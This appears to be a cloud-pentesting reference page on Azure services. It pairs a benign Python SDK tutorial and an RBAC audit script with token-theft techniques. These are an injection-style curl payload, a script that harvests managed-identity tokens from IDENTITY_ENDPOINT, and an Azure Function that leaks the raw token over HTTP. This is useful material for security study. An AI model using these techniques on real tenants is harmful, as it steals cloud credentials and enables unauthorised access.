Az - Services


Portals

You can find the list of Microsoft portals at https://msportals.io/.

Raw requests

Azure API via PowerShell

Get an access_token from IDENTITY_HEADER and IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

Then query the Azure REST API to get the subscription ID and other information.

# Access token returned by the managed identity endpoint
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# Graph alternative (needs a token requested for https://graph.microsoft.com/)
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
# (set $URI to one of the following and repeat the request above)
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
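
The permissions call in the last URI returns a list of entries with actions and notActions. The following sketch is an added example, not part of the original page: it evaluates such a response for Microsoft.Compute/virtualMachines/runCommand/action, which is what an audit of who can run commands on a VM needs. The sample responses and the names matches and granting_entries are constructed for illustration.

```python
import json
import re

RUN_COMMAND = "Microsoft.Compute/virtualMachines/runCommand/action"

def matches(pattern: str, action: str) -> bool:
    """RBAC action patterns are case-insensitive; '*' matches any run of characters."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, action, flags=re.IGNORECASE) is not None

def granting_entries(permissions: dict, action: str = RUN_COMMAND) -> list:
    """Indexes of the entries in a permissions response that grant `action`.

    notActions is subtracted from actions inside the same entry only; entries
    are additive, so an exclusion in one entry does not cancel another's grant.
    """
    hits = []
    for i, entry in enumerate(permissions.get("value", [])):
        allowed = any(matches(p, action) for p in entry.get("actions", []))
        excluded = any(matches(p, action) for p in entry.get("notActions", []))
        if allowed and not excluded:
            hits.append(i)
    return hits

# Constructed sample responses, not captured from a real subscription.
READER = json.loads('{"value": [{"actions": ["*/read"], "notActions": []}]}')
VM_ADMIN_NO_RUNCMD = json.loads("""{"value": [{
    "actions": ["Microsoft.Compute/virtualMachines/*"],
    "notActions": ["Microsoft.Compute/virtualMachines/runCommand/*"]}]}""")
TWO_ASSIGNMENTS = json.loads("""{"value": [
    {"actions": ["Microsoft.Compute/virtualMachines/*"],
     "notActions": ["Microsoft.Compute/virtualMachines/runCommand/*"]},
    {"actions": ["microsoft.compute/virtualmachines/runcommand/action"],
     "notActions": []}]}""")
OWNER = json.loads('{"value": [{"actions": ["*"], "notActions": []}]}')

if __name__ == "__main__":
    for name, resp in [("reader", READER), ("vm-admin-no-runcmd", VM_ADMIN_NO_RUNCMD),
                       ("two-assignments", TWO_ASSIGNMENTS), ("owner", OWNER)]:
        hits = granting_entries(resp)
        print(f"{name}: runCommand {'GRANTED by entry ' + str(hits) if hits else 'not granted'}")
```

The two-assignments case is the one to watch in a review: a role that excludes runCommand through notActions does not stop a second assignment from granting it.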

Azure API via Python

To interact with Azure services using Python, you can make use of the Azure SDK for Python. This SDK provides a set of libraries and tools that allow you to easily access and manage various Azure services programmatically.

To get started, install the SDK packages you need. The SDK is published as one package per service, so for the examples below run:

pip install azure-identity azure-storage-blob

Once the SDK is installed, you can import the necessary modules in your Python script to interact with Azure services. For example, to work with Azure Blob Storage, you can import the azure.storage.blob module:

from azure.storage.blob import BlobServiceClient

You will also need to authenticate your Python script to access your Azure resources. This can be done with credentials already available in the environment or with an application registered in Azure Active Directory (AAD).

To authenticate with the credentials available in the environment (environment variables, a managed identity, an Azure CLI login), you can use the DefaultAzureCredential class from the azure.identity module:

from azure.identity import DefaultAzureCredential

credential = DefaultAzureCredential()

Alternatively, you can authenticate as an application (service principal). This requires registering an application in Azure AD and obtaining a client ID and client secret. You can then use the ClientSecretCredential class from the azure.identity module:

from azure.identity import ClientSecretCredential

tenant_id = "<your-tenant-id>"
client_id = "<your-client-id>"
client_secret = "<your-client-secret>"

credential = ClientSecretCredential(tenant_id, client_id, client_secret)

Once you have authenticated, you can create an instance of the Azure service client and start interacting with the service. For example, to create a BlobServiceClient instance for Azure Blob Storage, you can use the following code:

blob_service_client = BlobServiceClient(account_url="<your-account-url>", credential=credential)

You can then use the methods provided by the Azure service client to perform various operations on the service. For example, to upload a file to Azure Blob Storage, get a blob client from the service client and call its upload_blob method:

blob_client = blob_service_client.get_blob_client(container="<container-name>", blob="<blob-name>")
with open("<path-to-file>", "rb") as data:
    blob_client.upload_blob(data)

This is just a basic example of how to interact with Azure services using Python. The Azure SDK for Python provides a wide range of functionalities and features for working with different Azure services. You can refer to the official documentation for more information on how to use the SDK and its capabilities.

import json
import os

# Set by App Service / Azure Functions when a managed identity is assigned
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

# Token for the Azure Resource Manager (management) API
print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

# Token for the Microsoft Graph API
print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

Or inside a Python function:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
    logging.info('Python HTTP trigger function processed a request.')
    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
    cmd = 'curl "%s?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
    val = os.popen(cmd).read()
    # The raw token JSON is returned in the HTTP response body
    return func.HttpResponse(val, status_code=200)

List of Services

The pages in this section are ordered by Azure service. In them you can find information about each service (how it works and its capabilities) and how to enumerate it.
